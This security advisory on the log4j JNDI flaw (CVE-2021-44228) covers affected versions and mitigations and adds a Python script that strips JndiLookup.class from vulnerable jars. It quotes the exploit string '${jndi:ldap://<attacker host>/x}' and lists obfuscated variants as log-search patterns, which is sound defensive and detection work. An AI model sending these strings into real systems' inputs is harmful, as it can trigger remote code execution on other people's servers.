Critical Vulnerability in log4j (CVE-2021-44228)

December 10, 2021

Updated Dec. 20, 2021

Summary

A critical vulnerability has been found in the widely used Java logging library log4j. It allows remote code execution by an unauthenticated attacker, is easy to exploit, and proof-of-concept code is publicly available. The flaw is in log4j's lookup substitution: when a logged message contains a string such as ${jndi:ldap://<attacker host>/x}, log4j resolves it through JNDI and loads the object the attacker's server returns, so any attacker-controlled input that ends up in a log message (a User-Agent header, a form field, a username) can trigger it.

Vulnerable Library

2.0 <= Apache log4j < 2.17.0 (log4j 1.x does not contain the JNDI lookup and is not affected by this CVE)

Mitigations

  • Upgrade to log4j 2.17.0 or later. Check every copy on the classpath, including copies pulled in as transitive dependencies or bundled inside application jars and WAR files; the version actually loaded is what matters, not the one named in your build file.

  • If you are running a version older than 2.17.0 and cannot upgrade, remove the JNDI lookup from the classpath: either delete org/apache/logging/log4j/core/lookup/JndiLookup.class from the log4j-core jar, or substitute a non-vulnerable or empty implementation of org.apache.logging.log4j.core.lookup.JndiLookup that your classloader picks up instead of the vulnerable class. Refer to your application's or stack's class loading documentation to understand how it resolves classes, and verify afterwards that the vulnerable class is no longer present on the classpath. Restart the JVM after the change; a JndiLookup class that is already loaded stays in memory.
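One way to carry out the second mitigation across a host, as an added example (not code from this advisory or from the log4j project): find every log4j-core jar under a directory, read its version, and remove JndiLookup.class from any jar older than 2.17.0, which is the removal form of the mitigation above. It assumes the jar's version is recorded in Maven's pom.properties, as released log4j-core jars do, and it only examines files named log4j-core*.jar; the sample jars built by demo() are constructed stand-ins, not real log4j artifacts.

```python
# Added example, not from the advisory or the log4j project: find log4j-core
# jars under a directory, read each jar's version, and strip JndiLookup.class
# from any jar older than 2.17.0. Assumption: released log4j-core jars record
# their version in Maven's pom.properties; a jar with no readable version is
# treated as vulnerable rather than skipped.
import os
import re
import shutil
import tempfile
import zipfile

JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
FIXED = (2, 17, 0, 0)  # first version the advisory treats as not vulnerable


def parse_version(text):
    """'2.14.1' -> (2, 14, 1, 0); a pre-release such as '2.0-beta9' sorts below 2.0.0."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?(-\S+)?", text.strip())
    if not m:
        return None
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0), -1 if m.group(4) else 0)


def jar_version(jar_path):
    """Version string from the jar's pom.properties, or None if it is missing."""
    with zipfile.ZipFile(jar_path) as zf:
        if POM_PROPERTIES not in zf.namelist():
            return None
        for line in zf.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                return line.split("=", 1)[1].strip()
    return None


def is_vulnerable(jar_path):
    """True if JndiLookup.class is still present and the version is < 2.17.0 or unknown."""
    with zipfile.ZipFile(jar_path) as zf:
        if JNDI_LOOKUP not in zf.namelist():
            return False  # already stripped: nothing for ${jndi:...} to reach
    version = jar_version(jar_path)
    parsed = parse_version(version) if version else None
    return parsed is None or parsed < FIXED


def strip_jndi_lookup(jar_path):
    """Rewrite the jar without JndiLookup.class. zipfile cannot delete in place, so
    copy every other entry to a temp file beside the jar and atomically swap it in.
    Returns True if the class was removed, False if the jar did not contain it."""
    with zipfile.ZipFile(jar_path) as src:
        if JNDI_LOOKUP not in src.namelist():
            return False
        fd, tmp = tempfile.mkstemp(dir=os.path.dirname(os.path.abspath(jar_path)), suffix=".tmp")
        os.close(fd)
        with zipfile.ZipFile(tmp, "w") as dst:
            for item in src.infolist():
                if item.filename != JNDI_LOOKUP:
                    dst.writestr(item, src.read(item.filename))
    shutil.copymode(jar_path, tmp)
    os.replace(tmp, jar_path)
    return True


def scan_and_mitigate(root, dry_run=True):
    """Walk root; return {jar path: (version, vulnerable)} for every log4j-core*.jar.
    With dry_run=False, vulnerable jars have JndiLookup.class removed."""
    report = {}
    for dirpath, _, filenames in os.walk(root):
        for name in sorted(filenames):
            if name.startswith("log4j-core") and name.endswith(".jar"):
                path = os.path.join(dirpath, name)
                vulnerable = is_vulnerable(path)
                report[path] = (jar_version(path), vulnerable)
                if vulnerable and not dry_run:
                    strip_jndi_lookup(path)
    return report


def make_sample_jar(path, version):
    """Constructed stand-in for a log4j-core jar: pom.properties plus an empty class entry."""
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with zipfile.ZipFile(path, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(POM_PROPERTIES, f"version={version}\n")
        zf.writestr(JNDI_LOOKUP, b"")


def demo():
    """Two constructed jars (2.14.1 and 2.17.0); returns {name: vulnerable} before and after fixing."""
    root = tempfile.mkdtemp()
    try:
        for v in ("2.14.1", "2.17.0"):
            make_sample_jar(os.path.join(root, "lib", f"log4j-core-{v}.jar"), v)
        before = {os.path.basename(p): vuln for p, (_, vuln) in scan_and_mitigate(root).items()}
        scan_and_mitigate(root, dry_run=False)
        after = {os.path.basename(p): vuln for p, (_, vuln) in scan_and_mitigate(root).items()}
        return before, after
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, (version, vulnerable) in scan_and_mitigate(root, dry_run="--fix" not in sys.argv).items():
        print("VULNERABLE" if vulnerable else "ok", version or "?", path)
```

Run it with a directory to report only, and add --fix to strip the class from vulnerable jars. Shaded or uber jars and jars nested inside WAR/EAR files do not match the log4j-core* filename and must be unpacked or checked separately, and a jar that has been stripped still reports its old version, which is why the check looks for the class itself rather than trusting the version alone.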

If you are unable to quickly mitigate this vulnerability on a P3 or P4 system, please open a ticket with ISO by emailing security@berkeley.edu.

If you administer a publicly accessible P3 or P4 system that was vulnerable, examine your access and application logs after mitigating for occurrences of "${jndi:". Attackers also sent obfuscated forms of the payload that a search for that literal string will miss, for example ${${lower:j}ndi: or ${${::-j}ndi:, as well as URL-encoded forms such as %24%7Bjndi in request paths, so search for those variants too. If any matches are found, please open a ticket with ISO by emailing security@berkeley.edu.

References